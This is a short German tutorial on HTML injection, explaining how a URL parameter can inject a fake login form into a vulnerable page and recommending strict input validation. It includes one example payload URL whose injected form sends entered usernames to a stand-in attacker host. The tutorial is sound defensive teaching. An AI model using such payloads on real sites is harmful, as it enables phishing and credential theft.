Quickie: Man kann einer URL beliebigen HTML code anhängen, welcher ausgeführt wird, wenn HTML Injection nicht abgefangen wird.

Wie in der Einführung über Cross-Site Scripting gelesen, handelt es sich meistens um schadenden JavaScript Code. Es kann aber auch mit normalem HTML geschehen, etwa, wenn man ein Formular in ein ‚iframe‘ einbettet und anschliessend die Benutzerdaten ausliest.

Der Schutz geht wieder dahin, die übermittelten Daten genauestens zu prüfen.

Hier ein Beispiel, wie dies ablaufen könnte:

1. Ein Angreifer entdeckt, dass Ihre Seite HTML Injection zulässt.
2. Er erstellt einen Link inklusive seinem schadenden HTML-Code und sendet den Link Ihnen in einem Email zu.

3. Sie sind neugierig, klicken auf den Link und der HTML Code wird gerendert. Dieser bittet Sie auf, Ihren Benutzernamen und das Passwort einzugeben.
4. Sie geben es ein, im Glaube, es ist eine vertrauenswürdige Homepage, doch stattdessen wird es an den Server des Angreifers geschickt.

Ja, genau: Das bedeutet, in einem Link kann man HTML Code anhängen! Etwa Text oder ein ganzes Login-Formular.

Beispiel:
http ://www.test.com/test.php?name=<h3>Bitte Benutzername eingeben:</h3><form method=“POST“
action=“http ://hackerseite/page.php“>Username: <input type=“text“ name=“username“ /><input type=“submit“ value=“Login“ /></form>

So wird in der angezeigten Seite ein Login Formular gerendert, wenn dieses nicht abgefangen wird. Wenn Sie sich die URL nicht genau angesehen haben, werden Sie nicht merken, dass dies von einem Angreifer eingefügt wurde.

Aus diesem Grund müssen HTML Injections immer abgefangen werden, da ein Angreifer Ihre Seite beliebig manipulieren kann.